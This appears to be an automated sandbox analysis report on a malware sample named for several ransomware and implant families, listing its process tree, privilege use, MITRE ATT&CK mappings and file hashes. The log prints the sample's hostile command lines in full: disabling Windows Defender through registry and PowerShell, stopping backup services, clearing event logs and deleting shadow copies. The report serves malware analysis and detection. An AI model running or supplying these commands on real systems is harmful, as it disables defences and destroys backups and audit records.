\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3672 powershell.exe 3672 powershell.exe 3672 powershell.exe 5516 powershell.exe 5516 powershell.exe 5516 powershell.exe 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 4544 wevtutil.exe Token: SeBackupPrivilege 4544 wevtutil.exe Token: SeSecurityPrivilege 848 wevtutil.exe Token: SeBackupPrivilege 848 wevtutil.exe Token: SeSecurityPrivilege 6076 wevtutil.exe Token: SeBackupPrivilege 6076 wevtutil.exe Token: SeIncreaseQuotaPrivilege 432 wmic.exe Token: SeSecurityPrivilege 432 wmic.exe Token: SeTakeOwnershipPrivilege 432 wmic.exe Token: SeLoadDriverPrivilege 432 wmic.exe Token: SeSystemProfilePrivilege 432 wmic.exe Token: SeSystemtimePrivilege 432 wmic.exe Token: SeProfSingleProcessPrivilege 432 wmic.exe Token: SeIncBasePriorityPrivilege 432 wmic.exe Token: SeCreatePagefilePrivilege 432 wmic.exe Token: SeBackupPrivilege 432 wmic.exe Token: SeRestorePrivilege 432 wmic.exe Token: SeShutdownPrivilege 432 wmic.exe Token: SeDebugPrivilege 432 wmic.exe Token: SeSystemEnvironmentPrivilege 432 wmic.exe Token: SeRemoteShutdownPrivilege 432 wmic.exe Token: SeUndockPrivilege 432 wmic.exe Token: SeManageVolumePrivilege 432 wmic.exe Token: 33 432 wmic.exe Token: 34 432 wmic.exe Token: 35 432 wmic.exe Token: 36 432 wmic.exe Token: SeIncreaseQuotaPrivilege 2520 wmic.exe Token: SeSecurityPrivilege 2520 wmic.exe Token: SeTakeOwnershipPrivilege 2520 wmic.exe Token: SeLoadDriverPrivilege 2520 wmic.exe Token: SeSystemProfilePrivilege 2520 wmic.exe Token: SeSystemtimePrivilege 2520 wmic.exe Token: SeProfSingleProcessPrivilege 2520 wmic.exe Token: SeIncBasePriorityPrivilege 2520 wmic.exe Token: SeCreatePagefilePrivilege 2520 wmic.exe Token: SeBackupPrivilege 2520 wmic.exe Token: SeRestorePrivilege 2520 wmic.exe Token: SeShutdownPrivilege 2520 wmic.exe Token: SeDebugPrivilege 2520 wmic.exe Token: SeSystemEnvironmentPrivilege 2520 wmic.exe Token: SeRemoteShutdownPrivilege 2520 wmic.exe Token: SeUndockPrivilege 2520 wmic.exe Token: SeManageVolumePrivilege 2520 wmic.exe Token: 33 2520 wmic.exe Token: 34 2520 wmic.exe Token: 35 2520 wmic.exe Token: 36 2520 wmic.exe Token: SeIncreaseQuotaPrivilege 2520 wmic.exe Token: SeSecurityPrivilege 2520 wmic.exe Token: SeTakeOwnershipPrivilege 2520 wmic.exe Token: SeLoadDriverPrivilege 2520 wmic.exe Token: SeSystemProfilePrivilege 2520 wmic.exe Token: SeSystemtimePrivilege 2520 wmic.exe Token: SeProfSingleProcessPrivilege 2520 wmic.exe Token: SeIncBasePriorityPrivilege 2520 wmic.exe Token: SeCreatePagefilePrivilege 2520 wmic.exe Token: SeBackupPrivilege 2520 wmic.exe Token: SeRestorePrivilege 2520 wmic.exe Token: SeShutdownPrivilege 2520 wmic.exe Token: SeDebugPrivilege 2520 wmic.exe Token: SeSystemEnvironmentPrivilege 2520 wmic.exe Token: SeRemoteShutdownPrivilege 2520 wmic.exe Token: SeUndockPrivilege 2520 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2724 wrote to memory of 4652 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 89 PID 2724 wrote to memory of 4652 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 89 PID 2724 wrote to memory of 4652 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 89 PID 4652 wrote to memory of 1452 4652 net.exe 91 PID 4652 wrote to memory of 1452 4652 net.exe 91 PID 4652 wrote to memory of 1452 4652 net.exe 91 PID 2724 wrote to memory of 4808 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 92 PID 2724 wrote to memory of 4808 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 92 PID 2724 wrote to memory of 4808 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 92 PID 4808 wrote to memory of 3984 4808 net.exe 94 PID 4808 wrote to memory of 3984 4808 net.exe 94 PID 4808 wrote to memory of 3984 4808 net.exe 94 PID 2724 wrote to memory of 3740 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 95 PID 2724 wrote to memory of 3740 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 95 PID 2724 wrote to memory of 3740 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 95 PID 3740 wrote to memory of 4264 3740 net.exe 97 PID 3740 wrote to memory of 4264 3740 net.exe 97 PID 3740 wrote to memory of 4264 3740 net.exe 97 PID 2724 wrote to memory of 3528 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 98 PID 2724 wrote to memory of 3528 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 98 PID 2724 wrote to memory of 3528 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 98 PID 3528 wrote to memory of 828 3528 net.exe 100 PID 3528 wrote to memory of 828 3528 net.exe 100 PID 3528 wrote to memory of 828 3528 net.exe 100 PID 2724 wrote to memory of 5392 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 101 PID 2724 wrote to memory of 5392 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 101 PID 2724 wrote to memory of 5392 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 101 PID 5392 wrote to memory of 4468 5392 net.exe 103 PID 5392 wrote to memory of 4468 5392 net.exe 103 PID 5392 wrote to memory of 4468 5392 net.exe 103 PID 2724 wrote to memory of 1640 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 104 PID 2724 wrote to memory of 1640 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 104 PID 2724 wrote to memory of 1640 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 104 PID 1640 wrote to memory of 5048 1640 net.exe 106 PID 1640 wrote to memory of 5048 1640 net.exe 106 PID 1640 wrote to memory of 5048 1640 net.exe 106 PID 2724 wrote to memory of 5024 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 107 PID 2724 wrote to memory of 5024 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 107 PID 2724 wrote to memory of 5024 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 107 PID 5024 wrote to memory of 2984 5024 net.exe 109 PID 5024 wrote to memory of 2984 5024 net.exe 109 PID 5024 wrote to memory of 2984 5024 net.exe 109 PID 2724 wrote to memory of 2736 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 110 PID 2724 wrote to memory of 2736 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 110 PID 2724 wrote to memory of 2736 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 110 PID 2736 wrote to memory of 4828 2736 net.exe 112 PID 2736 wrote to memory of 4828 2736 net.exe 112 PID 2736 wrote to memory of 4828 2736 net.exe 112 PID 2724 wrote to memory of 2572 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 113 PID 2724 wrote to memory of 2572 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 113 PID 2724 wrote to memory of 2572 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 113 PID 2724 wrote to memory of 4876 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 115 PID 2724 wrote to memory of 4876 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 115 PID 2724 wrote to memory of 4876 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 115 PID 2724 wrote to memory of 1484 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 117 PID 2724 wrote to memory of 1484 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 117 PID 2724 wrote to memory of 1484 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 117 PID 2724 wrote to memory of 3636 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 119 PID 2724 wrote to memory of 3636 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 119 PID 2724 wrote to memory of 3636 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 119 PID 2724 wrote to memory of 2540 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 121 PID 2724 wrote to memory of 2540 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 121 PID 2724 wrote to memory of 2540 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 121 PID 2724 wrote to memory of 1924 2724 2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-12_f5d7efaec3c1274b0aaa704a6caa1671_frostygoop_hive_sliver_snatch.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵
- System Location Discovery: System Language Discovery
PID:1452
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵
- System Location Discovery: System Language Discovery
PID:3984
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵
- System Location Discovery: System Language Discovery
PID:4264
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵
- System Location Discovery: System Language Discovery
PID:828
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5392 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵
- System Location Discovery: System Language Discovery
PID:4468
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵
- System Location Discovery: System Language Discovery
PID:5048
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵
- System Location Discovery: System Language Discovery
PID:2984
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_2991f" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_2991f" /y3⤵
- System Location Discovery: System Language Discovery
PID:4828
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2572
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4876
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1484
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3636
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2540
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1924
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4936
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_2991f" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3680
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1444
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1496
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- System Location Discovery: System Language Discovery
PID:3108
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:5616
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2016
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2092
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1540
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3332
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2776
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:4616
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:3868
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:4500
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:644
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:5272
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:5532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:5848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:4076
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:2564
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:5228
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵
- System Location Discovery: System Language Discovery
PID:3104
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:3396
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:3920
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:208
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2424
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:1628
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4812
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:5728
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:996
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:3880
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6076
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵
- System Location Discovery: System Language Discovery
PID:5400
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵
- System Location Discovery: System Language Discovery
PID:3616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3672
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- System Location Discovery: System Language Discovery
PID:5592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5516
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Impair Defenses
3Disable or Modify Tools
2Indicator Removal
2Clear Windows Event Logs
1File Deletion
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51baa273d4db8d917553db9f7f30cfa1e
SHA1c6e9e81aeb6e1b75317874b79a0b94ecdf235bf6
SHA256df70bc8ecc225eba78e05789f7922efd830321899b700d9770d385f10bbfbf79
SHA512798efefc754d9c031066e050155f8cae2f82c585ef2b8725807ff72e58cf4ac0ef13419e4a623bb3d1d1cf34bd6b89420bdf1de066acc8b833a7110cdfbf62ec
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5ab18250756e57eb91a18f1ffbcfd8842
SHA15edcf15b6c7526977478005742902d4cb44aa681
SHA256aa645c6591a3c087f7809fc9e98c31f6a7b186fa00e26851c03cae07951e2a66
SHA51206770f700c3dada7934b7e90778af0cdb9ea7b078f954d0966cf582969591956a282301e138fae400fba5dade92146e6bbac0993957f44e97af2b690c9d03b5f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82